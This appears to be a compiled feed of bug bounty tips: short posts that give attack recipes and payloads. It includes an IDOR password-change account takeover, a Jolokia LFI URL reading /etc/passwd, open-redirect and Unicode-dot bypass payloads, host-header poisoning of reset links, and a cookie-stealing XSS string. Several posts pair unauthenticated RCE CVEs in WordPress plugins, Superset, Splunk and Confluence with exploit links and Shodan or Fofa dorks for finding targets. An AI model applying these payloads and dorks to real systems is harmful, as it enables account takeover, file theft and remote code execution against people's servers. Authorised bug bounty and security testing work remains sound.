Mifare 1K Classic 💩 easy alot with Proxmark 🤌🏻 #pentest #Pentesting #hacking #hardware

IDOR + ATO Account Takeover via Reset Password

- a logged in area;
- intercept password change request;
- change username to another;
- if u have successfully changed user pass, u have an IDOR + ATO;

Impact: Critical

#bugbounty #bugbounty tips #bugbounty tip

Found Jolokia endpoint?
/actuator/jolokia/

Try LFI (local file inclusion) (misconfig)

PoC: xxxx[.]com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd

#bugbounty #bugbounty tips #bugbounty tip #lfi

App running moodle?🔥
Ex URL: https://xxx/mod/lti/auth.php

We can test an openredirect payload in the redirect_uri parameter

?redirect_uri=//example.com

Ref OWASP: cheatsheetseries.owasp.org/cheatsheets/Un…

#bugbounty #bugbounty tip #bugbounty tips

Bypass open redirection whitelisted using chinese dots:

%E3%80%82

Tip: Keep eyes on SSO redirects
#bugbounty #bugbounty tips #bugbounty tip

PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8

Query Fofa: body='/wp-content/themes/bricks/'
PoC: github.com/Chocapikk/CVE-…
Nuclei: github.com/Christbowel/CV…

#bugbounty #bugbounty tip #bugbounty tips

Password reset link hijacked via host header poisoning:

Requested password reset, intercepted with Burp, added under Host (X-Forwarded-Host: xxx.com)

#bugbounty #bugbounty tips #bugbounty tip

Payload XSS (cross-site scripting) on login page:

');\\</script><script>alert(document.cookie)</script>('%[email protected]

#bugbounty #bugbounty tips #bugbounty tip

PoC CVE-2023-6553 RCE Unauth Backup Migration plugin < 1.3.7, via /includes/backup-heart.php. According to official Wordpress statistics, 50k sites running WordPress still use the vulnerable version.

github.com/Chocapikk/CVE-…

#bugbounty #bugbounty tip #bugbounty tips #hacking

PoC CVE-2023-27524 Insecure Default Configuration in Apache Superset Leads to RCE (Remote Code Execution) + Shodan Dork:

github.com/horizon3ai/CVE…

Shodan Dork: http.favicon.hash:1582430156

#bugbounty #bugbounty tips #bugbounty tip

PoC CVE-2023-46214 Splunk Enterprise RCE (Remote Code Execution)

github.com/nathan31337/Sp…
blog.hrncirik.net/cve-2023-46214…

#bugbounty #bugbounty tip #bugbounty tips

PoC CVE-2023-3452 RCE / RFI Unauthenticated
Wordpress Plugin Canto < 3.0.5
github.com/leoanggal1/CVE…

#bugbounty #bugbounty tips #bugbounty tip

PoC Privilege Escalation in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)

Code is available at: gist.github.com/win3zz/aa1ac16…

For more details, refer to the original research article: wiz.io/blog/ubuntu-ov…

#hacking #bugbounty #bugbounty tip #bugbounty tips #ubuntu

XSS (dalfox)
Open redirect (Oralyzer)
SSRF (headers interactsh, param values with ffuf)
CRLF (crlfuzz)
LFI (ffuf)
SQLi (SQLMap, ghauri)
SSTI (ffuf)
SSL (testssl)
Broken Links (katana)
Prototype Pollution (ppfuzz)
4XX Bypasser (byp4xx)

#bugbounty #bugbounty tips #bugbounty tip

Confluence Broken Access Control CVE-2023-22515

PoC: yuvvi21.medium.com/confluence-cve…

Nuclei template: github.com/projectdiscove…

Exploit: github.com/Chocapikk/CVE-…

#bugbounty #bugbounty tip #bugbounty tips